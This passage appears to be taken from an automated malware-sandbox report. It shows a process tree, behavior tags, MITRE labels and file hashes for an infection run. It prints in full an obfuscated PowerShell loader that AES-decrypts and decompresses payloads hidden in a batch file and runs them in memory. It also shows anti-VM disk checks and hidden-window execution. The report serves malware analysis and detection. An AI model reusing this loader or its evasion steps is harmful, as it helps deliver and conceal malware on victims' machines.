'$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));3⤵PID:3584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:3004 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4684
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:1716
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"5⤵PID:1168
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));5⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4484 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:3068
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3760
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\hlPFLa.exe"C:\Windows\$nya-onimai2\hlPFLa.exe"2⤵
- Executes dropped EXE
PID:2192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4668
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3828
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3968
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3748
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4344
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2976
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1608
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:1844
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5da760f8b53fcde92d67d6a610f0a4707
SHA18c75b58f43455329c26520540461832bb90bffeb
SHA2561435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528
SHA51290e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0
-
Filesize
1KB
MD5aedb4691b4a410acfe415bdf5817c0d9
SHA1acdbec00fdeb48253388f5fa7439e26cbfdebe7d
SHA256cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42
SHA5121712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.2MB
MD5b052451fc18d2a15c1d83312b55d09a3
SHA181ed7f80a894ceaca01153920d3b5e73f593d6a5
SHA256adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890
SHA5129102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659